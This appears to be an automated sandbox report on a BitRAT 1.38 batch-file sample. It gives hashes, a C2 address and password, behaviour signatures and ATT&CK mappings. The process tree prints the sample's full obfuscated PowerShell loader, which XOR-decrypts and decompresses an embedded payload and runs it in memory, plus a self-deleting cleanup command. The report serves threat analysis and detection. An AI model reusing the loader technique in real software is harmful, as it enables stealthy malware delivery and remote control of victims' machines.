Analysis

  • max time kernel
    147s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-05-2023 05:40

General

  • Target

    test_bat_c/96c2a10be0c3dbe0d46fd81787b72d26aabab425cc5b0cc317f2035f272294c7.bat

  • Size

    3.8MB

  • MD5

    6fc558d212f65828c274f27909e51aa7

  • SHA1

    612487c386d838f506021ff846b47944b255a6a3

  • SHA256

    96c2a10be0c3dbe0d46fd81787b72d26aabab425cc5b0cc317f2035f272294c7

  • SHA512

    a9a2218f65e5c48c8906505f1da7061179e2a749c6e93146ea33badfb0d4bda04433861d144aa4decccaca2e1c4ddf0db67e749602cf1d41091c29426c8cab1c

  • SSDEEP

    49152:2EqA3wg9X6szO4oX2nOw/YNBsXCzJtitbEbyzIBlkW1fMxpqZ8tAO3:z

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

91.151.89.242:3434

Attributes
  • communication_password

    3c3662bcb661d6de679c636744c66b62

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test_bat_c\96c2a10be0c3dbe0d46fd81787b72d26aabab425cc5b0cc317f2035f272294c7.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2640
    • C:\Users\Admin\AppData\Local\Temp\test_bat_c\96c2a10be0c3dbe0d46fd81787b72d26aabab425cc5b0cc317f2035f272294c7.bat.exe
      "96c2a10be0c3dbe0d46fd81787b72d26aabab425cc5b0cc317f2035f272294c7.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $XLWhh = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test_bat_c\96c2a10be0c3dbe0d46fd81787b72d26aabab425cc5b0cc317f2035f272294c7.bat').Split([Environment]::NewLine);foreach ($WsFgo in $XLWhh) { if ($WsFgo.StartsWith(':: ')) { $JxeYG = $WsFgo.Substring(3); break; }; };$chhJU = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($JxeYG);$ZKRDr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3cgBc+XH5sweWk/CLj6TVRIWMhpkocSi4UhQ/JQ9ghE=');for ($i = 0; $i -le $chhJU.Length - 1; $i++) { $chhJU[$i] = ($chhJU[$i] -bxor $ZKRDr[$i % $ZKRDr.Length]); };$hfZVr = New-Object System.IO.MemoryStream(, $chhJU);$wXYTE = New-Object System.IO.MemoryStream;$DjQPH = New-Object System.IO.Compression.GZipStream($hfZVr, [IO.Compression.CompressionMode]::Decompress);$DjQPH.CopyTo($wXYTE);$DjQPH.Dispose();$hfZVr.Dispose();$wXYTE.Dispose();$chhJU = $wXYTE.ToArray();$ZCCzR = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($chhJU);$wjVeh = $ZCCzR.EntryPoint;$wjVeh.Invoke($null, (, [string[]] ('')))
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4432
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of AdjustPrivilegeToken
        PID:644
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe"
        3⤵
          PID:4268
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1552
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
          3⤵
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2148
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\test_bat_c\96c2a10be0c3dbe0d46fd81787b72d26aabab425cc5b0cc317f2035f272294c7.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\test_bat_c\96c2a10be0c3dbe0d46fd81787b72d26aabab425cc5b0cc317f2035f272294c7.bat.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3692
          • C:\Windows\system32\choice.exe
            choice /c y /n /d y /t 1
            4⤵
              PID:4724
            • C:\Windows\system32\attrib.exe
              attrib -h -s "C:\Users\Admin\AppData\Local\Temp\test_bat_c\96c2a10be0c3dbe0d46fd81787b72d26aabab425cc5b0cc317f2035f272294c7.bat.exe"
              4⤵
              • Views/modifies file attributes
              PID:2140

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      Hidden Files and Directories

      1
      T1158

      Defense Evasion

      Hidden Files and Directories

      1
      T1158

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Command and Control

      Web Service

      1
      T1102

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yulybe0o.vjs.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\test_bat_c\96c2a10be0c3dbe0d46fd81787b72d26aabab425cc5b0cc317f2035f272294c7.bat.exe
        Filesize

        442KB

        MD5

        04029e121a0cfa5991749937dd22a1d9

        SHA1

        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

        SHA256

        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

        SHA512

        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      • C:\Users\Admin\AppData\Local\Temp\test_bat_c\96c2a10be0c3dbe0d46fd81787b72d26aabab425cc5b0cc317f2035f272294c7.bat.exe
        Filesize

        442KB

        MD5

        04029e121a0cfa5991749937dd22a1d9

        SHA1

        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

        SHA256

        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

        SHA512

        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      • memory/644-158-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/644-182-0x0000000074B60000-0x0000000074B76000-memory.dmp
        Filesize

        88KB

      • memory/644-179-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/644-177-0x0000000074B60000-0x0000000074B99000-memory.dmp
        Filesize

        228KB

      • memory/644-173-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/644-162-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/644-159-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/644-154-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-178-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-186-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-238-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-234-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-163-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-161-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-169-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-230-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-227-0x0000000074B60000-0x0000000074B99000-memory.dmp
        Filesize

        228KB

      • memory/1552-225-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-221-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-176-0x0000000074B60000-0x0000000074B99000-memory.dmp
        Filesize

        228KB

      • memory/1552-217-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-213-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-209-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-205-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-180-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-181-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-183-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-184-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-185-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-201-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-187-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-188-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-189-0x0000000071810000-0x0000000071849000-memory.dmp
        Filesize

        228KB

      • memory/1552-190-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-196-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-192-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-193-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/1552-194-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/2148-174-0x0000000004ED0000-0x0000000004EE0000-memory.dmp
        Filesize

        64KB

      • memory/2148-197-0x0000000004ED0000-0x0000000004EE0000-memory.dmp
        Filesize

        64KB

      • memory/2148-198-0x0000000006B10000-0x0000000006B1A000-memory.dmp
        Filesize

        40KB

      • memory/2148-170-0x0000000005490000-0x0000000005A34000-memory.dmp
        Filesize

        5.6MB

      • memory/2148-191-0x0000000005E60000-0x0000000005E6A000-memory.dmp
        Filesize

        40KB

      • memory/4268-155-0x0000000000400000-0x000000000040C000-memory.dmp
        Filesize

        48KB

      • memory/4268-171-0x0000000005830000-0x00000000058C2000-memory.dmp
        Filesize

        584KB

      • memory/4432-148-0x000001BA95E90000-0x000001BA95EA0000-memory.dmp
        Filesize

        64KB

      • memory/4432-149-0x000001BA95E90000-0x000001BA95EA0000-memory.dmp
        Filesize

        64KB

      • memory/4432-151-0x000001BA95E90000-0x000001BA95EA0000-memory.dmp
        Filesize

        64KB

      • memory/4432-143-0x000001BA95E90000-0x000001BA95EA0000-memory.dmp
        Filesize

        64KB

      • memory/4432-142-0x000001BAB1F00000-0x000001BAB1F22000-memory.dmp
        Filesize

        136KB

      • memory/4432-150-0x000001BA95E90000-0x000001BA95EA0000-memory.dmp
        Filesize

        64KB

      • memory/4432-152-0x000001BA95E90000-0x000001BA95EA0000-memory.dmp
        Filesize

        64KB